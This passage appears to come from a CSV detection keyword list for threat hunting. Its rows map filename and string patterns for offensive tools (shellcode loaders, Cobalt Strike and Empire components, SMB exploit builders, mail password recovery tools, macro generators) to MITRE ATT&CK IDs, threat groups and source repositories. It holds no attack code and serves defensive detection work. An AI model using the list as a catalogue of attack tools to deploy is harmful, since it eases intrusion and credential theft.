tools,https://github.com/michaelweber/Macrome,1,0,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome.csproj*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome.dll*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*Macrome.sln*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*MACshellcode.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*MACshellcode.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*MACshellcode.sln*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*MACshellcode.vcxproj*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*magicRasMan*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,0,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -*Magnitude Exploit Kit*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,0,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*mailpv.exe*,offensive_tool_keyword,mailpv,Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mailpv.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*mailpv.zip*,offensive_tool_keyword,mailpv,Mail PassView is a small password-recovery tool that reveals the passwords and other account details in email clients,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/mailpv.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*MailSniper*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc...). It can be used as a non-administrative user to search their own email. or by an Exchange administrator to search the mailboxes of every user in a domain,T1083 - T1114 - T1003,TA0003 - TA0007 - TA0040,N/A,N/A,Information Gathering,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*MailSniper.ps1*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*main/gcr.py*,offensive_tool_keyword,GCR-Google-Calendar-RAT,Google Calendar RAT is a PoC of Command&Control over Google Calendar Events,T1071.001 - T1021.002 - T1059,TA0002 - TA0005,N/A,N/A,C2,https://github.com/MrSaighnal/GCR-Google-Calendar-RAT,1,1,N/A,10,10,78,15,2023-06-26T09:04:02Z,2023-06-18T13:23:31Z -*main_air_service-probes.go*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*main_pro_service-probes.go*,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,1,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*majdfhpaihoncoakbjgbdhglocklcgno*,greyware_tool_keyword,Free VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*make_avet -l *.exe *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*make_avetsvc *,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*make_kernel_shellcode*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_kernel_user_payload*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_anonymous_login_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_echo_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_free_hole_session_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_nt_trans_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb1_trans2_explo*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb2_payload_body_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*make_smb2_payload_headers_packet*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-EternalBlue.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*makebof.bat*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*MakeHTTPSmugglerJAR.launch*,offensive_tool_keyword,burpsuite,A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nccgroup/BurpSuiteHTTPSmuggler,1,1,N/A,N/A,7,668,108,2019-05-04T06:15:42Z,2018-07-03T07:47:58Z -*malicious.csproj*,offensive_tool_keyword,PowerLessShell,PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.,T1218.010 - T1059 - T1105 - T1047 - T1055,TA0002 - TA0011 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/PowerLessShell,1,1,N/A,N/A,10,1393,253,2023-03-23T13:30:14Z,2017-05-29T23:03:52Z -*malicious.dll*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*MaliciousMacroGenerator*,offensive_tool_keyword,MaliciousMacroGenerator,Simple utility design to generate obfuscated macro that also include a AV / Sandboxes escape mechanism.,T1027 - T1564 - T1127 - T1059 - T1562,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator,1,0,N/A,N/A,9,808,210,2019-04-17T19:47:38Z,2016-09-21T23:18:14Z -*MaliciousMacroMSBuild-master*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,1,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*Malleable C2 Files*,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 